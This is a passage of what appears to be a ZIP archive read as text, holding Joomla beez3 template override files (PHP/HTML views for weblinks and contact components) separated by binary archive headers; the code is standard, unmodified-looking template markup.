			<div class="controls">
				<?php echo $this->form->getInput('catid'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('tags'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('tags'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('url'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('url'); ?>
			</div>
		</div>
		<?php if ($this->user->authorise('core.edit.state', 'com_weblinks.weblink')) : ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('state'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('state'); ?>
				</div>
			</div>
		<?php endif; ?>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('language'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('language'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('description'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('description'); ?>
			</div>
		</div>

		<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
		<input type="hidden" name="task" value="" />
		<?php echo JHtml::_('form.token'); ?>
	</form>
</div>
PK՜�\5�����4beez3/html/com_weblinks/categories/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(WeblinksHelperRoute::getCategoryRoute($item->id)); ?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>
		<?php if ($this->params->get('show_subcat_desc_cat') == 1) : ?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_weblinks.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_num_links_cat') == 1) : ?>
			<dl class="weblink-count"><dt>
				<?php echo JText::_('COM_WEBLINKS_NUM'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK՜�\g�Y((.beez3/html/com_weblinks/categories/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
			<div class="category-desc base-desc">
			<?php echo JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_weblinks.categories'); ?>
			</div>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc base-desc">
					<?php echo JHtml::_('content.prepare', $this->parent->description, '', 'com_weblinks.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
	<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>
PK՜�\@��oRR,beez3/html/layouts/joomla/system/message.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2014 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

?>
<div id="system-message-container">
	<?php if (is_array($msgList) && $msgList) : ?>
		<dl id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<?php if ($msgs) : ?>
					<dt class="<?php echo strtolower($type); ?>"><?php echo JText::_($type); ?></dt>
					<dd class="<?php echo strtolower($type); ?> message">
						<ul>
							<?php foreach ($msgs as $msg) : ?>
								<li><?php echo $msg; ?></li>
							<?php endforeach; ?>
						</ul>
					</dd>
				<?php endif; ?>
			<?php endforeach; ?>
		</dl>
	<?php endif; ?>
</div>
PK՜�\z��''1beez3/html/com_contact/category/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework');

$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));
?>
<?php if (empty($this->items)) : ?>
	<p> <?php echo JText::_('COM_CONTACT_NO_CONTACTS'); ?> </p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm">
<?php if ($this->params->get('show_pagination_limit')) : ?>
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>

		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	</fieldset>
<?php endif; ?>
	<table class="category">
		<?php if ($this->params->get('show_headings')) : ?>
		<thead><tr>

			<?php if ($this->params->get('show_image_heading')) : ?>
			<th class="item-image">
			</th>
			<?php endif; ?>
			<th class="item-title">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_CONTACT_EMAIL_NAME_LABEL', 'a.name', $listDirn, $listOrder); ?>
			</th>
			<?php if ($this->params->get('show_position_headings')) : ?>
			<th class="item-position">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_POSITION', 'a.con_position', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>
			<?php if ($this->params->get('show_email_headings')) : ?>
			<th class="item-email">
				<?php echo JText::_('JGLOBAL_EMAIL'); ?>
			</th>
			<?php endif; ?>
			<?php if ($this->params->get('show_telephone_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_TELEPHONE'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_mobile_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_MOBILE'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_fax_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_FAX'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_suburb_headings')) : ?>
			<th class="item-suburb">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_SUBURB', 'a.suburb', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_state_headings')) : ?>
			<th class="item-state">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_STATE', 'a.state', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_country_headings')) : ?>
			<th class="item-state">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_COUNTRY', 'a.country', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			</tr>
		</thead>
		<?php endif; ?>

		<tbody>
			<?php foreach ($this->items as $i => $item) : ?>
				<?php if ($this->items[$i]->published == 0) : ?>
					<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
				<?php else: ?>
					<tr class="cat-list-row<?php echo $i % 2; ?>" >
				<?php endif; ?>

					<?php if ($this->params->get('show_image_heading')) : ?>
						<td class="item-image">
							<?php if ($this->items[$i]->image) : ?>
								<?php echo JHtml::_('image', $this->items[$i]->image, JText::_('COM_CONTACT_IMAGE_DETAILS'), array('class' => 'contact-thumbnail img-thumbnail')); ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>

					<td class="item-title">
						<a href="<?php echo JRoute::_(ContactHelperRoute::getContactRoute($item->slug, $item->catid)); ?>">
							<?php echo $item->name; ?></a>
					</td>

					<?php if ($this->params->get('show_position_headings')) : ?>
						<td class="item-position">
							<?php echo $item->con_position; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_email_headings')) : ?>
						<td class="item-email">
							<?php echo $item->email_to; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_telephone_headings')) : ?>
						<td class="item-phone">
							<?php echo $item->telephone; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_mobile_headings')) : ?>
						<td class="item-phone">
							<?php echo $item->mobile; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_fax_headings')) : ?>
					<td class="item-phone">
						<?php echo $item->fax; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_suburb_headings')) : ?>
					<td class="item-suburb">
						<?php echo $item->suburb; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_state_headings')) : ?>
					<td class="item-state">
						<?php echo $item->state; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_country_headings')) : ?>
					<td class="item-state">
						<?php echo $item->country; ?>
					</td>
					<?php endif; ?>

				</tr>
			<?php endforeach; ?>

		</tbody>
	</table>

	<?php if ($this->params->get('show_pagination')) : ?>
	<div class="pagination">
		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
		<p class="counter">
			<?php echo $this->pagination->getPagesCounter(); ?>
		</p>
		<?php endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php endif; ?>
	<div>
		<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
		<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
	</div>
</form>
<?php endif; ?>
PK՜�\���[��4beez3/html/com_contact/category/default_children.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(ContactHelperRoute::getCategoryRoute($child->id));?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) :?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_contact.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_items') == 1) :?>
				<dl><dt>
					<?php echo JText::_('COM_CONTACT_CAT_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
		<?php endif; ?>
			<?php if (count($child->getChildren()) > 0 ) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK՜�\���+beez3/html/com_contact/category/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<div class="contact-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_contact.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->def('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_contact.category.description'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php echo $this->loadTemplate('items'); ?>

<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
</div>
<?php endif; ?>
</div>
PK՜�\���2beez3/html/com_contact/contact/default_address.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/* marker_class: Class based on the selection of text, none, or icons
 * jicon-text, jicon-none, jicon-icon
 */
?>
<dl class="contact-address dl-horizontal">
<?php if (($this->contact->address || $this->contact->suburb  || $this->contact->state || $this->contact->country || $this->contact->postcode) && ($addressCheck = $this->params->get('address_check') > 0)) : ?>
	<?php if ($addressCheck === true) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_address'); ?>
		</span>
	</dt>
	<dd>
	<address>
	<?php endif; ?>
	<?php if ($this->contact->address && $this->params->get('show_street_address')) : ?>
		<span class="contact-street">
			<?php echo nl2br($this->contact->address); ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->suburb && $this->params->get('show_suburb')) : ?>
		<span class="contact-suburb">
			<?php echo $this->contact->suburb; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->state && $this->params->get('show_state')) : ?>
		<span class="contact-state">
			<?php echo $this->contact->state; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->postcode && $this->params->get('show_postcode')) : ?>
		<span class="contact-postcode">
			<?php echo $this->contact->postcode; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->country && $this->params->get('show_country')) : ?>
		<span class="contact-country">
			<?php echo $this->contact->country; ?>
		</span>
	<?php endif; ?>
<?php endif; ?>
<?php if ($this->params->get('address_check') > 0) : ?>
	</address>
	</dd>
<?php endif; ?>

<?php if ($this->contact->email_to && $this->params->get('show_email')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_email'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-emailto">
			<?php echo $this->contact->email_to; ?>
		</span>
	</dd>
<?php endif; ?>

<?php if ($this->contact->telephone && $this->params->get('show_telephone')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_telephone'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-telephone">
			<?php echo nl2br($this->contact->telephone); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->fax && $this->params->get('show_fax')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_fax'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-fax">
		<?php echo nl2br($this->contact->fax); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->mobile && $this->params->get('show_mobile')) :?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_mobile'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-mobile">
			<?php echo nl2br($this->contact->mobile); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->webpage && $this->params->get('show_webpage')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
		</span>
	</dt>
	<dd>
		<span class="contact-webpage">
			<a href="<?php echo $this->contact->webpage; ?>" target="_blank" rel="noopener noreferrer">
			<?php echo $this->contact->webpage; ?></a>
		</span>
	</dd>
<?php endif; ?>
</dl>
PK՜�\v6�3beez3/html/com_contact/contact/default_articles.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JLoader::register('ContentHelperRoute', JPATH_SITE . '/components/com_content/helpers/route.php');

?>
<?php if ($this->params->get('show_articles')) : ?>
<div class="contact-articles">

	<ol>
		<?php foreach ($this->item->articles as $article) :	?>
			<li>
				<?php echo JHtml::_('link', JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)), htmlspecialchars($article->title, ENT_COMPAT, 'UTF-8')); ?>
			</li>
		<?php endforeach; ?>
	</ol>
</div>
<?php endif; ?>
PK՜�\`<���/beez3/html/com_contact/contact/default_form.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

if (isset($this->error)) : ?>
	<div class="contact-error">
		<?php echo $this->error; ?>
	</div>
<?php endif; ?>

<div class="contact-form">
	<form id="contact-form" action="<?php echo JRoute::_('index.php'); ?>" method="post" class="form-validate form-horizontal">
		<fieldset>
			<legend><?php echo JText::_('COM_CONTACT_FORM_LABEL'); ?></legend>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_name'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_name'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_email'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_email'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_subject'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_subject'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_message'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_message'); ?></div>
			</div>
				<?php if ($this->params->get('show_email_copy', 0)){ ?>
					<div class="control-group">
						<div class="control-label"><?php echo $this->form->getLabel('contact_email_copy'); ?></div>
						<div class="controls"><?php echo $this->form->getInput('contact_email_copy'); ?></div>
					</div>
				<?php } ?>
			<?php //Dynamically load any additional fields from plugins. ?>
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
					<?php if ($fieldset->name !== 'contact'):?>
						<?php $fields = $this->form->getFieldset($fieldset->name);?>
						<?php foreach ($fields as $field) : ?>
							<div class="control-group">
								<?php if ($field->hidden) : ?>
									<div class="controls">
									 <?php echo $field->input;?>
									</div>
								<?php else:?>
									<div class="control-label">
										<?php echo $field->label; ?>
										<?php if (!$field->required && $field->type !== 'Spacer') : ?>
											<span class="optional"><?php echo JText::_('COM_CONTACT_OPTIONAL');?></span>
										<?php endif; ?>
									</div>
									<div class="controls"><?php echo $field->input;?></div>
								<?php endif;?>
							</div>
						<?php endforeach;?>
					<?php endif ?>
				<?php endforeach;?>
				<div class="form-actions"><button class="btn btn-primary validate" type="submit"><?php echo JText::_('COM_CONTACT_CONTACT_SEND'); ?></button>
					<input type="hidden" name="option" value="com_contact" />
					<input type="hidden" name="task" value="contact.submit" />
					<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
					<input type="hidden" name="id" value="<?php echo $this->contact->slug; ?>" />
					<?php echo JHtml::_('form.token'); ?>
				</div>
		</fieldset>
	</form>
</div>
PK՜�\a�9��/beez3/html/com_contact/contact/encyclopedia.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$cparams = JComponentHelper::getParams('com_media');
?>
<div class="contact<?php echo $this->pageclass_sfx?>">
		<?php $contactLink = ContactHelperRoute::getCategoryRoute($this->contact->catid);?>
		<h3>
			<span class="contact-category"><a href="<?php echo $contactLink; ?>">
				<?php echo $this->escape($this->contact->category_title); ?></a>
			</span>
		</h3>
	<?php if ($this->contact->name && $this->params->get('show_name')) : ?>
		<h2>
			<span class="contact-name"><?php echo $this->contact->name; ?></span>
		</h2>
	<?php endif;  ?>

	<?php echo $this->item->event->afterDisplayTitle; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

	<div class="encyclopedia_col1">
		<?php if ($this->contact->image ) : ?>
			<div class="contact-image">
			<?php // We are going to use the contact address field for the main image caption.
				// If we have a caption load the caption behavior. ?>
			<?php if ($this->contact->address)
			{
				JHtml::_('behavior.caption');
			}?>
				<?php echo JHtml::_('image', $this->contact->image, $this->contact->name, array('align' => 'middle', 'class' => 'caption', 'title' => $this->contact->address)); ?>
			</div>
		<?php endif; ?>
	</div>
	<div class="encyclopedia_col2">
		<?php // We are going to use some of the standard content fields in non standard ways. ?>
				<div class="contact-miscinfo">

						<div class="contact-misc">
							<?php echo $this->contact->misc; ?>
						</div>
					</div>


		<?php //Let's use position for the scientific name. ?>
		<?php if ($this->contact->con_position && $this->params->get('show_position')) : ?>
			<p class="contact-position"><?php echo $this->contact->con_position; ?></p>
		<?php endif; ?>
		<?php //Let's use state to put the family name.  ?>
		<?php if ($this->contact->state && $this->params->get('show_state')) : ?>
			<p class="contact-state"><?php echo $this->contact->state; ?></p>
		<?php endif; ?>
		<?php // Let's use country to list the main countries it grows in. ?>
		<?php if ($this->contact->country && $this->params->get('show_country')) : ?>
			<p class="contact-country"><?php echo $this->contact->country; ?></p>
		<?php endif; ?>
	</div>

<div class="clr"> </div>
	<?php  if ($this->params->get('presentation_style') !== 'plain'):?>
		<?php  echo  JHtml::_($this->params->get('presentation_style').'.start', 'contact-slider'); ?>
	<?php endif ?>
<div class="encyclopedia_links">
<?php echo $this->loadTemplate('links'); ?>

</div>
	<?php if ($this->params->get('presentation_style') !== 'plain'):?>
			<?php echo JHtml::_($this->params->get('presentation_style').'.end'); ?>
			<?php endif; ?>
</div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK՜�\�6����*beez3/html/com_contact/contact/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$cparams = JComponentHelper::getParams('com_media');
?>

<div class="contact<?php echo $this->pageclass_sfx?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
		<h1>
			<?php echo $this->escape($this->params->get('page_heading')); ?>
		</h1>
	<?php endif; ?>
	<?php if ($this->contact->name && $this->params->get('show_name')) : ?>
		<div class="page-header">
			<h2>
				<span class="contact-name"><?php echo $this->contact->name; ?></span>
			</h2>
		</div>
	<?php endif;  ?>
	<?php if ($this->params->get('show_contact_category') === 'show_no_link') : ?>
		<h3>
			<span class="contact-category"><?php echo $this->contact->category_title; ?></span>
		</h3>
	<?php endif; ?>
	<?php if ($this->params->get('show_contact_category') === 'show_with_link') : ?>
		<?php $contactLink = ContactHelperRoute::getCategoryRoute($this->contact->catid);?>
		<h3>
			<span class="contact-category"><a href="<?php echo $contactLink; ?>">
				<?php echo $this->escape($this->contact->category_title); ?></a>
			</span>
		</h3>
	<?php endif; ?>

	<?php echo $this->item->event->afterDisplayTitle; ?>

	<?php if ($this->params->get('show_contact_list') && count($this->contacts) > 1) : ?>
		<form action="#" method="get" name="selectForm" id="selectForm">
			<label for="select_contact"><?php echo JText::_('COM_CONTACT_SELECT_CONTACT'); ?></label>
			<?php echo JHtml::_('select.genericlist', $this->contacts, 'select_contact', 'class="inputbox" onchange="document.location.href = this.value"', 'link', 'name', $this->contact->link); ?>
		</form>
	<?php endif; ?>

	<?php if (!empty($this->item->tags->itemTags) && $this->params->get('show_tags', 1)) : ?>
		<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
		<?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
	<?php endif; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

	<?php  if ($this->params->get('presentation_style') === 'sliders') : ?>
		<?php echo JHtml::_('sliders.start', 'panel-sliders', array('useCookie' => '1')); ?>
		<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_DETAILS'), 'basic-details'); ?>
	<?php endif; ?>
	<?php  if ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.start', 'tabs', array('useCookie' => '1')); ?>
		<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_DETAILS'), 'basic-details'); ?>

	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'plain'):?>
		<?php  echo '<h3>' . JText::_('COM_CONTACT_DETAILS') . '</h3>';  ?>
	<?php endif; ?>

	<?php if ($this->contact->image && $this->params->get('show_image')) : ?>
		<div class="thumbnail pull-right">
			<?php echo JHtml::_('image', $this->contact->image, htmlspecialchars($this->contact->name,  ENT_QUOTES, 'UTF-8'), array('style' => 'vertical-align: middle;')); ?>
		</div>
	<?php endif; ?>

	<?php if ($this->contact->con_position && $this->params->get('show_position')) : ?>
		<dl class="contact-position dl-horizontal">
		<dt><?php echo JText::_('COM_CONTACT_POSITION'); ?>:</dt>
			<dd>
				<?php echo $this->contact->con_position; ?>
			</dd>
		</dl>
	<?php endif; ?>

	<?php echo $this->loadTemplate('address'); ?>

	<?php if ($this->params->get('allow_vcard')) :	?>
		<?php echo JText::_('COM_CONTACT_DOWNLOAD_INFORMATION_AS');?>
			<a href="<?php echo JRoute::_('index.php?option=com_contact&amp;view=contact&amp;id='.$this->contact->id . '&amp;format=vcf'); ?>">
			<?php echo JText::_('COM_CONTACT_VCARD');?></a>
	<?php endif; ?>

	<?php if (($this->contact->email_to || $this->contact->user_id) && $this->params->get('show_email_form')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') : ?>
			<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_EMAIL_FORM'), 'display-form'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_EMAIL_FORM'), 'display-form'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php  echo '<h3>'. JText::_('COM_CONTACT_EMAIL_FORM').'</h3>';  ?>
		<?php endif; ?>
		<?php  echo $this->loadTemplate('form');  ?>

	<?php endif; ?>

	<?php if ($this->params->get('show_links')) : ?>
		<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>

	<?php if ($this->contact->user_id && $this->contact->articles && $this->params->get('show_articles')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('JGLOBAL_ARTICLES'), 'display-articles'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('JGLOBAL_ARTICLES'), 'display-articles'); ?>
		<?php endif; ?>
		<?php if  ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('JGLOBAL_ARTICLES').'</h3>'; ?>
		<?php endif; ?>

		<?php echo $this->loadTemplate('articles'); ?>

	<?php endif; ?>

	<?php if ($this->contact->user_id && $this->params->get('show_profile') && JPluginHelper::isEnabled('user', 'profile')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_PROFILE'), 'display-profile'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_PROFILE'), 'display-profile'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('COM_CONTACT_PROFILE').'</h3>'; ?>
		<?php endif; ?>

		<?php echo $this->loadTemplate('profile'); ?>

	<?php endif; ?>

	<?php if ($this->contactUser && $this->params->get('show_user_custom_fields')) : ?>
		<?php echo $this->loadTemplate('user_custom_fields'); ?>
	<?php endif; ?>

	<?php if ($this->contact->misc && $this->params->get('show_misc')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_OTHER_INFORMATION'), 'display-misc'); ?>
		<?php endif; ?>
